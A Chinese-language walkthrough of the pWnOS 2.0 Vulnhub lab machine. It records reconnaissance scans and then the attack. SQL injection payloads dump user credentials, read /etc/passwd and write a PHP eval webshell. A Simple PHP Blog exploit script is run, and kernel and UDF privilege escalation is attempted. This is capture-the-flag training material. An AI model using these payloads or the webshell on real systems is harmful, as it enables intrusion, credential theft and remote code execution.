0%

Vulnhub-pWnOS2.0

一个简单的靶机~

靶机下载链接

0x01 信息收集

nmap扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
nmap -p- 10.10.10.100 -sC -sV -T5
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-11 20:18 CST
Nmap scan report for 10.10.10.100
Host is up (0.00057s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
| 2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_ 256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.17 (Ubuntu)
|_http-title: Welcome to this Site!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.07 seconds

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
/activate (Status: 302)
/activate.php (Status: 302)
/blog (Status: 301)
/cgi-bin/ (Status: 403)
/includes (Status: 301)
/index (Status: 200)
/index.php (Status: 200)
/info (Status: 200)
/info.php (Status: 200)
/login (Status: 200)
/login.php (Status: 200)
/register (Status: 200)
/register.php (Status: 200)
/server-status (Status: 403)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
2020/07/11 21:56:15 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/add (Status: 302)
/atom (Status: 200)
/categories (Status: 302)
/colors (Status: 302)
/config (Status: 301)
/comments (Status: 302)
/content (Status: 301)
/contact (Status: 200)
/delete (Status: 302)
/docs (Status: 301)
/flash (Status: 301)
/images (Status: 301)
/interface (Status: 301)
/info (Status: 302)
/index (Status: 200)
/languages (Status: 301)
/login (Status: 200)
/logout (Status: 302)
/options (Status: 302)
/rdf (Status: 200)
/scripts (Status: 301)
/rss (Status: 200)
/setup (Status: 302)
/static (Status: 302)
/themes (Status: 301)
/trackback (Status: 302)
/search (Status: 200)
/upload_img (Status: 302)
/upgrade (Status: 302)
/stats (Status: 200)

nikto扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
nikto -h http://10.10.10.100
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.100
+ Target Hostname: 10.10.10.100
+ Target Port: 80
+ Start Time: 2020-07-11 20:18:33 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.17 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.5-1ubuntu7
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ /info/: Output from the phpinfo() function was found.
+ OSVDB-3092: /info/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3092: /register/: This might be interesting...
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 1311031, size: 5108, mtime: Tue Aug 28 18:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /login.php: Admin login page/section found.
+ 8310 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time: 2020-07-11 20:18:49 (GMT8) (16 seconds)
---------------------------------------------------------------------------
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
nikto -h http://10.10.10.100/blog
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.100
+ Target Hostname: 10.10.10.100
+ Target Port: 80
+ Start Time: 2020-07-11 20:51:51 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.17 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.5-1ubuntu7
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /blog/scripts/: Directory indexing found.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ /blog/index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /blog/config/: Directory indexing found.
+ /blog/config/: Configuration information may be available remotely.
+ OSVDB-12184: /blog/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /blog/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /blog/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /blog/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /blog/login/: This might be interesting...
+ OSVDB-3092: /blog/stats/: This might be interesting...
+ OSVDB-3092: /blog/scripts/: This might be interesting... possibly a system shell found.
+ OSVDB-3268: /blog/images/: Directory indexing found.
+ OSVDB-3268: /blog/docs/: Directory indexing found.
+ OSVDB-3268: /blog/images/?pattern=/etc/*&sort=name: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /blog/config/config.txt, inode: 264197, size: 108, mtime: Tue May 10 07:12:22 2011
+ /blog/config/config.txt: Configuration file found.
+ /blog/login.php: Admin login page/section found.
+ 8313 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time: 2020-07-11 20:53:00 (GMT8) (69 seconds)
---------------------------------------------------------------------------

0x02 漏洞利用

Walkthrough-1

经过探索,我发现http://10.10.10.100/info.php是一个phpinfo页面,它向我们揭示了网站的绝对路径`/var/www/`

同时http://10.10.10.100/login.php存在sql注入漏洞。

我在这里爆破出了后台的用户名和密码,但是没什么用。

POST-sql
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
email=%27 union select 1,2,3,databases(),5,6,7,8 -- &pass=1&submit=Login&submitted=TRUE

email=%27 union select 1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database() -- &pass=1&submit=Login&submitted=TRUE


email=%27 union select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_schema='ch16' and table_name='users' -- &pass=1&submit=Login&submitted=TRUE

email=%27 union select 1,2,3,group_concat(email),5,6,7,8 from users -- &pass=1&submit=Login&submitted=TRUE

email=%27 union select 1,2,3,group_concat(pass),5,6,7,8 from users -- &pass=1&submit=Login&submitted=TRUE

email=%27 union select 1,2,3,load_file('/etc/passwd'),5,6,7,8 -- &pass=1&submit=Login&submitted=TRUE

email=%27 union select 1,2,3,load_file('/var/www/includes/config.inc.php'),5,6,7,8 -- &pass=1&submit=Login&submitted=TRUE

email=%27 union select 1,2,3,'<?php eval($_POST[admin])?>',5,6,7,8 into outfile '/var/www/blog/shell.php' -- &pass=1&submit=Login&submitted=TRUE

但是我在这里尝试去写文件,结果是成功写入的。

蚁剑连上后,发现/var/下有两个mysqli_connect的文件,两个密码都试了一下。。结果登录成功了root用户。

Walkthrough-2

和先前的步骤一样,从蚁剑连入然后反弹个shell回来。使用脚本获取提权建议后,我选择了CVE-2013-2094提权。

其他获得webshell的方法

因为网站根目录下还有一个blog的目录,对其进行进一步信息收集后,会发现该blog使用的是simple php blog版本应该是0.4.0。使用searchsploit搜索相关的exp后,会发现该cms版本有一个远程命令执行

将这个perl脚本下载回来后运行,可以将原本blog的帐号密码,替换为自己设置的密码。最后上传个木马什么的,也可以getshell。

1
perl 1191.pl -h http://10.10.10.100/blog -e 3 -U hacker -P hacker

可能可行的提权方式

运行了ps -ef后,发现mysql是由root用户运行,所以可以考虑udf提权?按照这篇博文测试我是没有成功的。

1
2
3
mysql> create function sys_eval returns string soname 'mysqludf.so';
create function sys_eval returns string soname 'mysqludf.so';
ERROR 1126 (HY000): Can't open shared library 'mysqludf.so' (errno: 22 /usr/lib/mysql/plugin/mysqludf.so: invalid ELF header)

失败的尝试

一开始尝试了脏牛提权,但是不成功。

0x03 总结

枚举是关键。